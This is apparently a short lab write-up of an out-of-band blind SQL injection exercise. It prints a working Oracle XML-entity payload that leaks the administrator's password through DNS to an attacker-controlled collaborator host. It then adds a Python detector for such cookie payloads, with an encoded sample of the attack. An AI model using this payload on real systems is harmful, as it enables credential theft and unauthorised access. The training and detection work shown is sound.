
We were able to see the TrackingID cookie after refreshing the page. So we used the blind SQLi payload below to perform a DNS lookup and send the query response in the DNS body to the Burp Collaborator link we controlled:
x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.BURP-COL-URL/"> %remote;]>'),'/l') FROM dual--
After sending the request and polling using Burp Collaborator, we were able to see the DNS lookup with the password of the administrator user from a public IP as below:


We logged in as administrator using the password and solved the lab.
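A defender-side view of the request above, as an added example that is not part of the original write-up: a Python check that URL-decodes every cookie in a request log and flags values combining the traits of this payload (a quote break-out into `UNION SELECT`, Oracle XML functions, an external entity, and a subquery concatenated into a hostname). The sample requests, the `collab.example` host, the threshold and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Traits of an out-of-band SQLi payload that abuses Oracle's XML parser.
SIGNALS = {
    "quote_then_union": re.compile(r"'\s*union\s+select", re.I),
    "oracle_xml_function": re.compile(r"\b(?:extractvalue|xmltype)\s*\(", re.I),
    "external_entity": re.compile(r"<!entity\s+%?\s*\w+\s+system\b", re.I),
    "subquery_in_hostname": re.compile(r"//'\s*\|\|\s*\(\s*select\b", re.I),
}

# Constructed sample requests: (method, path, Cookie header).
SAMPLE_REQUESTS = [
    ("GET", "/", "TrackingId=Zx81kQpLm3; session=abc123"),
    ("GET", "/", "TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d%221.0%22%3f>"
                 "<!DOCTYPE+root+[<!ENTITY+%25+remote+SYSTEM+%22http%3a//'||(SELECT+1+FROM+dual)||"
                 "'.collab.example/%22>+%25remote%3b]>'),'/l')+FROM+dual--; session=abc123"),
    ("GET", "/account", "pref=O'Brien; session=def456"),  # lone apostrophe, benign
]

def parse_cookies(header):
    """Split a Cookie header into (name, URL-decoded value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, unquote_plus(value)))
    return pairs

def cookie_signals(value):
    """Return the sorted names of every signal present in a decoded cookie value."""
    return sorted(name for name, rx in SIGNALS.items() if rx.search(value))

def scan(requests, threshold=2):
    """Flag cookies matching at least `threshold` signals (one alone is too noisy)."""
    findings = []
    for idx, (_method, _path, header) in enumerate(requests):
        for name, value in parse_cookies(header):
            hits = cookie_signals(value)
            if len(hits) >= threshold:
                findings.append((idx, name, hits))
    return findings

if __name__ == "__main__":
    for idx, name, hits in scan(SAMPLE_REQUESTS):
        print(f"request {idx}: cookie {name!r} matched {', '.join(hits)}")
```

Detection of this kind only supplements the fix on the server: binding the cookie value as a query parameter instead of concatenating it into the SQL string.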
